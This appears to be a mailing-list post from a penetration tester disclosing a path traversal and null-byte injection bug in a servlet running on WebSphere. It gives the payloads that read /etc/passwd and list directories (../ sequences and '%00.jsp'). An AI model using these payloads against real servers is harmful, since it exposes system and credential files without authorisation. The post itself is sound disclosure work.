Where does the hole lie?

[Steve Maks <smaks () verisign com>]

While pen-testing a client's webserver with WebSphere in place, I came
across a bug and I'm not sure whether the servlet is to blame or rather some
part of WebSphere.  The case is this:

After authenticating to the site, the user is sent to
http://site/servlet/App?target=/index.jsp.  If you change the target and ../
your way back up and then down again, accessing a file that exists such as
/etc/passwd gives the following error:

Error 403
An error has occured while processing request:http://site/ErrorReporter
Message: File not found: /../../../../../../etc/passwd

Target Servlet: file
StackTrace: 
----------------------------------------------------------------------------
----
Root Error-1: File not found: /../../../../../../etc/passwd
com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found:
/../../../../../../etc/passwd
--snip--

If I give it something that doesn't exist, such as /etc/passw, I get your
standard 404.  However, if I use the poision null byte trick and request
/etc/passwd%00.jsp (only works with the .jsp extension), I receive my file.
Consequently, a /etc%00.jsp and doing a view source will let me browse
directories.

My instinct is that this happens because the servlet doesn't check for a
null byte in the string, but I thought it was worthwhile to mention.  Thanks
for any input.

Steve